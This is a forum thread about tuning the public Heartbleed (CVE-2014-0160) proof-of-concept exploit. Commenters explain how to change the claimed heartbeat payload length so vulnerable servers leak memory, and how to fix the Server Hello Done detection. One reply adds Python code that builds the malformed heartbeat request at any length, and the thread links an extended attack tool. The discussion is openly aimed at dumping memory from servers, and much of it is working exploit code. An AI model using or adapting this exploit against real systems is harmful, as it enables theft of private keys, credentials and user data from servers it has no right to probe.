
Thanks for the information. I modified the script to request a different number of bytes. It seems that 16384 is too much and causes the server to abort sending, but lower amounts work to successfully dump memory.

EDIT: The other thing is that it seems better to check for "Server Hello Done" at the end of the handshake message as some servers seem to send all submessages within one handshake message (though not sure if they're OpenSSL-based), i.e. look for ord(pay[-4]) == 0x0E rather than at ord(pay[0]).




For those who don't know Python and/or don't know where to edit.

  import binascii
  def h2bin(x):  # equivalent to the PoC script's helper: hex text with whitespace -> bytes
      return binascii.unhexlify(x.replace(' ', '').replace('\n', ''))
  # Record header: type 18 (heartbeat), version 03 02 (TLS 1.1), length 00 03;
  # body: type 01 (heartbeat request), claimed payload length 40 00 = 0x4000.
  hb = h2bin('''
  18 03 02 00 03
  01 40 00
  ''')
See that "40 00" there? That's hex, and 0x4000 = 16384. Change it to something like "02 00", so it's 0x200 = 512, or 0x400 = 1024 ...or whatever you want. (But keep it at a power of 2... I assume.)

http://en.wikipedia.org/wiki/Power_of_two


As long as it's valid hex it should be fine; there seems to be a lower bound at which point servers don't respond, but I didn't play around for too long with that part. Most articles also mention 64 KB, which the script can do with some small modifications.
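The two points raised in this thread, the claimed payload length in the heartbeat record and checking for Server Hello Done when a server bundles several handshake submessages into one record, as an added Python 3 example that is not part of the original PoC script or of any comment here. It builds the heartbeat record from a chosen length instead of hand-editing hex, and it walks every handshake message in a record rather than peeking at `pay[0]` or `pay[-4]`, which is the general form of the check suggested above. Nothing is sent over the network: the handshake bytes it parses are constructed inline, and the function names are my own.

```python
import binascii
import struct

HANDSHAKE = 0x16         # TLS record content type: handshake
HEARTBEAT = 0x18         # TLS record content type: heartbeat
SERVER_HELLO_DONE = 0x0E  # handshake message type the PoC waits for


def h2bin(x):
    """Hex text with whitespace -> bytes (same shape as the PoC script's helper)."""
    return binascii.unhexlify(x.replace(' ', '').replace('\n', ''))


def build_heartbeat_request(claimed_len, version=(3, 2)):
    """Build the heartbeat record the PoC hard-codes, with a configurable claimed length.

    Layout: record type 0x18, 2-byte version, 2-byte record length (always 3 here),
    then a heartbeat request (type 1) whose 2-byte payload_length field claims
    `claimed_len` bytes while the record carries no payload at all.
    build_heartbeat_request(0x4000) reproduces the '18 03 02 00 03 01 40 00' bytes.
    """
    if not 0 <= claimed_len <= 0xFFFF:
        raise ValueError("payload length must fit in 16 bits")
    body = struct.pack('>BH', 1, claimed_len)
    return struct.pack('>BBBH', HEARTBEAT, version[0], version[1], len(body)) + body


def iter_records(data):
    """Yield (content_type, version, body) for each complete TLS record in `data`."""
    off = 0
    while off + 5 <= len(data):
        ctype, vmaj, vmin, length = struct.unpack('>BBBH', data[off:off + 5])
        body = data[off + 5:off + 5 + length]
        if len(body) < length:  # truncated record: stop rather than misparse
            break
        yield ctype, (vmaj, vmin), body
        off += 5 + length


def iter_handshake_messages(body):
    """Yield (handshake_type, payload) for every handshake message packed in one record body.

    Each message is a 1-byte type followed by a 3-byte big-endian length, so a
    record can carry ServerHello, Certificate and ServerHelloDone back to back.
    """
    off = 0
    while off + 4 <= len(body):
        htype = body[off]
        hlen = int.from_bytes(body[off + 1:off + 4], 'big')
        yield htype, body[off + 4:off + 4 + hlen]
        off += 4 + hlen


def saw_server_hello_done(data):
    """True once a ServerHelloDone appears in any handshake record in `data`,
    whether it came in its own record or bundled after other submessages."""
    for ctype, _ver, body in iter_records(data):
        if ctype != HANDSHAKE:
            continue
        for htype, _payload in iter_handshake_messages(body):
            if htype == SERVER_HELLO_DONE:
                return True
    return False


def handshake_record(*messages, version=(3, 2)):
    """Pack (handshake_type, payload) pairs into one handshake record; used only to build sample input."""
    body = b''.join(bytes([t]) + len(p).to_bytes(3, 'big') + p for t, p in messages)
    return struct.pack('>BBBH', HANDSHAKE, version[0], version[1], len(body)) + body


# Constructed samples (not captured traffic): a server that bundles ServerHello,
# Certificate and ServerHelloDone in one record, and one that sends them separately.
SERVER_HELLO = (0x02, b'\x03\x02' + b'\x00' * 32)   # version + zeroed random, enough for parsing
BUNDLED = handshake_record(SERVER_HELLO, (0x0B, b'\x00\x00\x00'), (SERVER_HELLO_DONE, b''))
SPLIT = handshake_record(SERVER_HELLO) + handshake_record((SERVER_HELLO_DONE, b''))

if __name__ == '__main__':
    print(build_heartbeat_request(0x4000).hex())
    print(build_heartbeat_request(0x200).hex())
    print(saw_server_hello_done(BUNDLED), saw_server_hello_done(SPLIT))
```

With the bundled sample, the PoC's original `ord(pay[0]) == 0x0E` test never fires (the record body starts with the ServerHello type, 0x02), while the `pay[-4]` check from the comment above and the message walk here both do; the walk also keeps working if a server puts ServerHelloDone anywhere other than last.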


You might also want to use [1]: XMPP, STARTTLS, proxy support with valid TLS records, custom payload and stuff, configurable via cmdline options.

[1] https://gist.github.com/tintinweb/10411753 | hb-test.py aka heartbleed.py



